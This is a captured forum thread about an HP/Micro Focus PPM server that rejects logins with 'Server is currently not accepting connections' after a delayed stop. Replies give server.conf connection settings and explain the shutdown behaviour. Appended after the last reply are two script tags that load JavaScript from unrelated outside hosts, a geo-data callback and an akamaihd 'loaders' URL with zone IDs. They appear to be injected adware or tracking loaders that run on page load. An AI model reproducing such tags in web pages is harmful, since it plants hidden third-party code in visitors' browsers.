The community will be in read-only from Tuesday 11:59pm (PST) to Wednesday 7:30am (PST)
The community will be in read-only from Tuesday 11:59pm (PST) to Wednesday 7:30am (PST)
Project and Portfolio Management Practitioners Forum
cancel
Showing results for 
Search instead for 
Did you mean: 

Server is currently not accepting connections

Highlighted
TurboMan
Member

Server is currently not accepting connections

Hi,

 

Sometimes, I need to stop PPM with delay option.

But, after I submit the delayed stop, no one can enter the PPM, and I see  "Server is currently not accepting connections" in log file.

Is this an expected behaviour or there is a server.config parameter to let people in even after the delayed stop.

 

Any help is appreciated

 

Regards

TM

7 REPLIES
d4y4n4
Frequent Visitor

Re: Server is currently not accepting connections

Hi TM,

Could you please attach the server.conf. We will need to check these parameter values


com.kintana.core.server.MAX_DB_CONNECTIONS
com.kintana.core.server.MAX_ITG_DB_CONNECTIONS
com.kintana.core.server.MAX_DASHBOARD_DB_CONNECTIONS

Regards,
Dayana Campos
TurboMan
Member

Re: Server is currently not accepting connections

Hi,

 

Settings are as follows.

 

com.kintana.core.server.MAX_DB_CONNECTIONS = 250
com.kintana.core.server.MAX_ITG_DB_CONNECTIONS = 150
com.kintana.core.server.MAX_DASHBOARD_DB_CONNECTIONS = 100

 

Thanks.

d4y4n4
Frequent Visitor

Re: Server is currently not accepting connections

Hi,

Let's increase the max db connection parameter on the PPM side and also set the oracle db setting

1. Stop PPM nodes.
2. Increase maximum connections in the server.conf like below:

 

com.kintana.core.server.MAX_DB_CONNECTIONS=300 com.kintana.core.server.MAX_ITG_DB_CONNECTIONS=250


3. Remove work and tmp folders
4. Run kUpdateHtml.sh script
5. Restart PPM nodes.

Check with your DBA to update the database parameters according to the sysadmin guide (page 107 ).

If after these changes, the problem still comes back. We will have to enable to ENABLE_DB_SESSION_TRACKING parameter to capture all of the db session and wait for PPM to go down again. Once we have this enabled, it should tell us what happened when PPM went down with the db connection error.

1.Add the following to server.conf: com.kintana.core.server.ENABLE_DB_SESSION_TRACKING=true
2. Run kUpdateHTML.sh
3.Restart PPM

Capture the logs and let me know the time when the issue was reproduce. Please attach the ksupport file as well.

Proactively monitor the SysAdmin reports called "Broker In Use Sessions" and "Broker Performance Report" every 30 minutes to 1 hour.

You can run it in the workbench when the server is up. When the db connection issue starts to happen, please use the kRunServerAdminReport.sh script under the bin directory to create the report.

They will show what code is using each DB connection and causing this problem.

Monitoring those reports, you will see when you are getting close to running out of connections.

 

Regards,

Dayana

Jim Esler
Honored Contributor

Re: Server is currently not accepting connections

Our experience with the message "Server is currently not accepting connections" is that it is returned to the user when they attempt to log in immediately after the kStop.sh script is run to stop the node. It will continue to be returned on login attempts for the duration of the delay specified on the command and any additional time that it takes for the node to shut down. The message has nothing to do with database connections.

 

This is the behavior we have seen since our first implementation with version 6.0. I have never seen any options to allow logins after a shutdown has been initiated. We never specify delays longer than 5 minutes so this has never been an issue. The delay warns workbench users to save their work and hopefully suppresses initiation of other activities (services?) while the node prepares to shut down.

Jim Esler
Honored Contributor

Re: Server is currently not accepting connections

This message is currently displayed to the user as a Java error with a stack trace. It looks like something failed even though the application is doing what it was told to do. It would be much more useful if a properly formatted page was displayed with an explanation that the server is shutting down in x minutes and new connections are not being accepted. It seems like this would be simple to implement.

TurboMan
Member

Re: Server is currently not accepting connections

So Jim, you are saying that this is an expected behavior.

But, not mentioned in the manuals at all, would be better if it had.

 

At least, I should be able to schedule a stop.

 

Regards

TM

 

jsalass
Frequent Visitor

Re: Server is currently not accepting connections

Hi Turboman,

 

Yes, this is an expected behaviour.

 

Once you stop the PPM server using the -delay<minutes> parameter instead of -now PPM won't accept any new connection since it is already in the process of disconnected PPM from the database.

 

Using the -delay <minutes> option automatically issues a message to advise all connected PPM Center users that the server will stop after the specified delay.

 

However, documentation is not clear when mentioned that new connections will be not accepted during the delay.

 

The schedule option would be a nice Enhancement Request for the the command. You can open a ticket and ask to log a new ER.

 

Regards,

Jonathan

 

 

 

 

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
//Add this to "OnDomLoad" event